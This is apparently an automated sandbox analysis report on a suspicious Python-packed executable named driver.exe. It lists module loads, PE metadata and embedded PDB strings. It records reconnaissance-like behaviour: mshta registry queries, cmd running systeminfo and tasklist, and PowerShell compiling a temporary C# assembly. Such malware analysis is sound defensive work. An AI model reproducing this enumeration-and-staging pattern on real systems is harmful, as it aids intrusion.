Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: driver.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: driver.exe

Static file information: File size 8761213 > 1048576

Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: driver.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: driver.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: driver.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: driver.exe, 00000002.00000002.2455137415.00007FF8B8F71000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: driver.exe, 00000002.00000002.2456731347.00007FF8BA4F1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: driver.exe, 00000002.00000002.2452820005.00007FF8B7E11000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: driver.exe, 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdb source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: driver.exe, 00000002.00000002.2452545913.00007FF8B7DF1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052849472.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: driver.exe, 00000002.00000002.2455696626.00007FF8B93C1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050389879.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: driver.exe, 00000002.00000002.2453359812.00007FF8B7E51000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053705049.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053032876.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: driver.exe, 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050203653.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053425753.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: driver.exe, 00000000.00000003.2050665502.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: driver.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: driver.exe, 00000002.00000002.2455998173.00007FF8B9841000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
